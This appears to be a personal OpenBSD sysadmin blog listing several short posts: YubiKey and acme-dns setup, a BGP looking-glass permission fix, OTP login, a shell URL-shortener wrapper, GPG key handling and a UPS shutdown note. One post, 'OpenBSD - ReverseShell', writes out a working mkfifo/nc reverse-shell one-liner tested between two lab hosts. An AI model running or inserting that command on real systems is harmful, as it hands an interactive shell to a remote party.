OpenBSD

Yubikey - on OpenBSD

Running YubiKey on OpenBSD

buy a Key and give try …

Source

https://www.yubico.com/

Install Software

pkg_add yubikey-manager-3.1.2p4
pkg_add yubikey-manager-3.1.2p4
quirks-6.42 signed on 2023-01-08T01:39:04Z
yubikey-manager-3.1.2p4:py3-click-7.1.2: ok
yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok
yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok
yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok
yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok
yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok
yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok
yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok
yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok
yubikey-manager-3.1.2p4:json-c-0.16: ok
yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok
yubikey-manager-3.1.2p4: ok
The following new rcscripts were installed: /etc/rc.d/pcscd
See rcctl(8) for details.
--- +yubikey-manager-3.1.2p4 -------------------
NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD.
Most of the "ykman fido xxx" commands (pin-setting and others) stall.

PC/SC Smart Card Daemon

rcctl enable pcscd
rcctl start pcscd

Attack Key

you have to Attack your Yubikey via USB Port … … and ask dmesg about the latest news ;)

Acme-DNS

Web

A simplified DNS server with a RESTful HTTP API to provide a simple way to automate ACME DNS challenges. Sounds promising, right ? Let’s give try ;)

Setup

fireup a new OpenBSD VM

  • let’s do it in London.
  • ip: 100.10.20.30

patch, update, add go

doas su -
syspatch
pkg_add -Vu
pkg_add go

clone repo and build acme-dns

cd /root
git clone https://github.com/joohoi/acme-dns
cd acme-dns
export GOPATH=/tmp/acme-dns
go build
cp acme-dns /usr/local/sbin/

Create Selfsign Cert

the RESTful API need’s a Cert. Let’s use a selfsigned Cert for this demonstration.

OpenBGPD - Upgrade Looking Glass

I’m running a BGP Looking Glass Server on https://bgp.stoege.net, where can get some view about BGP running on the Global Internet.

Upgrade to 7.2

Did an Upgrade to the latest Version with my Script.

Upgrade was sucessful, but the BGP Service needs some Fix. Website show as “500 Internal Server Error”, and the Logs got a few messages like this:

tail -f /var/log/messages

Oct 21 11:38:07 bapi slowcgi[62677]: execve /cgi-bin/bgplg: Permission denied
Oct 21 11:38:07 bapi slowcgi[93993]: caught exit of unknown child 62677
Oct 21 11:38:12 bapi slowcgi[45500]: execve /cgi-bin/bgplg: Permission denied

Reapply the Permission

chmod 0550 /var/www/cgi-bin/bgplg
chown www:daemon /var/www/cgi-bin/bgplg

chmod 0555 /var/www/bin/bgpctl
chmod 4555 /var/www/bin/ping* /var/www/bin/traceroute*

Check Service

$ curl --head "https://bgp.stoege.net/cgi-bin/bgplg"
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: keep-alive
Content-Type: text/html
Date: Fri, 21 Oct 2022 09:45:38 GMT
Server: OpenBSD httpd
Transfer-Encoding: chunked

and we’re back again …

OpenBSD 7.2

OpenBSD 7.2 finally released.

Yesterday, the 53th Relase of OpenBSD got publised, the [Version 7.2)(https://www.openbsd.org/72.html). I’ll upgrade my boxes as usual with the following Script. The most obvious change is the Performance improvement for the Package Mangager, but there is always so more see undeadly

Upgrade Guide

As usual, follow to official Upgrade Guide. You can Upgrade with an USB Stick, ISO Image, PXE Boot or inline (from a running system).

As with other Versions, i have my own upgrade Script for upgrading all my boxes. Use it at your own risk and test it somewhere before you do this on your productive environment.

Headscale - OpenBSD

Running Headscale Server on OpenBSD

i like and widely use wireguard for my infrastructure. i’m also aware of it’s limitation and i know the tailscale project but never gave try. recently, i stumbled upon the headscale project, an opensource alternative to for the (closed) tailscale server. perfect, let’s give a try!

and, of course, i’m gooing to implement this with OpenBSD, what else ;)

Doku

on the Server

compile and install server

this is working on OpenBSD 7.1, and also on the upcomming Version 7.2

OpenBSD & OTP

i don’t like ssh & password authentication. but sometime, specially during setup or recovery, it’s need and make sense. thought i’ll protect some boxes with otp. here a few notes and instrucations

Build login_otp

git clone https://github.com/reyk/login_otp
cd login_otp
make obj
make all
doas make install

Initialize OTP DB

doas otp -i

Generate Key for User

otp -g
Name: stoege
Key:  xxxx xxxx xxxx xxxx xxxx xxxx xx
URL:  otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30

Build QR Code

echo "otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30" |qrencode -t ansiutf8

and scan the code with the google authenticator (or similar app)

Url Shortener for CLI

CLI Url Shortener

wrote a little URL Shortener in Python with FastAPI and a wrapper script for cli usage. needs httpie & jq packages. python backend is under development, cli wrapper for different os right here …

Usage

somehost$ ./myurlshort

usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to

anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe
https://url.stoege.net/xXxXx

CLI Wrappers

OpenBSD

cat << 'EOF' > myurlshort
#!/usr/bin/env bash

# url shortener for openbsd, v1.0, 2022-09-12, by @stoege

which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; )
which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; )

if [[ $# -ne 1 ]]; then
  echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to\n"
  exit 1
fi

url="$1"

# check if http/https set
if ! ( [[ $1 == http* ]] || [[ $1 == https* ]] ); then
  url="https://$1"
  echo "adding https:// ... -> $url"
fi

https post url.stoege.net/url target_url="$url" |jq -r '.url'

exit 0
EOF

chmod 755 myurlshort

macOS

cat << 'EOF' > myurlshort
#!/usr/bin/env bash

# url shortener for macos, v1.0, 2022-09-12, by @stoege

which jq >/dev/null || ( echo -e "*** jq not installed ***\nbrew install jq\n"; )
which https >/dev/null || ( echo -e "*** httpie not installed ***\nbrew install httpie\n"; )

if [[ $# -ne 1 ]]; then
  echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to\n"
  exit 1
fi

url="$1"

# check if http/https set
if ! ( [[ $1 == http* ]] || [[ $1 == https* ]] ); then
  url="https://$1"
  echo "adding https:// ... -> $url"
fi

https post url.stoege.net/url target_url="$url" |jq -r '.url'

exit 0
EOF

chmod 755 myurlshort

Alpine

cat << 'EOF' > myurlshort
#!/usr/bin/env bash

# url shortener for alpine, v1.0, 2022-09-12, by @stoege

which jq >/dev/null || ( echo -e "*** jq not installed ***\napk add jq\n"; )
which https >/dev/null || ( echo -e "*** httpie not installed ***\napk add httpie\n"; )

if [[ $# -ne 1 ]]; then
  echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to\n"
  exit 1
fi

url="$1"

# check if http/https set
if ! ( [[ $1 == http* ]] || [[ $1 == https* ]] ); then
  url="https://$1"
  echo "adding https:// ... -> $url"
fi

https post url.stoege.net/url target_url="$url" |jq -r '.url'

exit 0
EOF

chmod 755 myurlshort

Any Comments ?

sha256: 75b0a781fd4569791f3d43932694e155a9443a739f0bf43b0e0904ce299eec3e

GPG & Gopass & Gitlab

GPG and how to use it

Create a Key with ECC

gpg --expert --full-generate-key
  • (9) ECC and ECC
  • (1) Curve 25519
  • 0 = key does not expire (or whatever you prefer!)
  • Real name: Max Muster
  • Email address: max@muster.net
  • Comment: -
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid                      Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]

Public Key

max@host $ gpg
/home/max/.gnupg/pubring.kbx
----------------------------
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]

Private Key

max@host $ gpg -K
/home/max/.gnupg/pubring.kbx
----------------------------
sec   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.net>
ssb   cv25519 2022-09-04 [E]

Export All Keys

ASCII Format

gpg --export --armor > public.key.asc
gpg --export-secret-key --armor > private.key.asc

GPG Format

gpg --output public.gpg --export
gpg --output private.gpg --export-secret-key

Export one Key only

Set Key

keyID=256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E

ASCII Format

gpg --export --armor > $keyID.pub.key.asc $keyID
gpg --export-secret-key --armor > $keyID.key.asc $keyID

GPG Format

gpg --output $keyID.pub.gpg --export $keyID
gpg --output $keyID.gpg --export-secret-key $keyID

Export to QRCode

gpg --export --armor |qrencode -t UTF8
gpg --export-secret-keys --armor |qrencode -t UTF8

Export QRCode to PNG

qrencode -r $keyID.pub.key.asc -o $keyID.pub.png
qrencode -r $keyID.key.asc -o $keyID.png

Delete private Key without asking!

gpg --yes --batch --delete-secret-key $keyID

Delete both Keys without asking!

gpg --yes --batch --delete-secret-and-public-key $keyID

Key Management

List Keys

max@host $ file *key*
private.key:     data
private.key.asc: ASCII text
public.key:      data
public.key.asc:  PGP public key block

Delete Key

keyID=
gpg --delete-secret-key $keyID
gpg --delete-key $keyID

or delete both without asking!

OpenBSD - ReverseShell

Reverse Shells

Test it

Listen on Host A

Set Lister on Host A (192.168.1.100)

hostA # nc -l 4242

Start Reverse Shell on Host B

hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

here we are

hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere

nice ;)


Any Comments ?

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

Sensorsd - UPS Shutdown

Shutdown Hosts on Power Outages

Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that.

Connection UPS to APU via USB Cable

dmesg show the UPS connected

APU# dmesg
uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ...
uhidev0: iclass 3/0, 142 report ids
upd0 at uhidev0
uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1
uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1
...
uhid21 at uhidev0 reportid 142: input=0, output=0, feature=4

Check sysctl

what kind of information do we get from the hardware sensor ?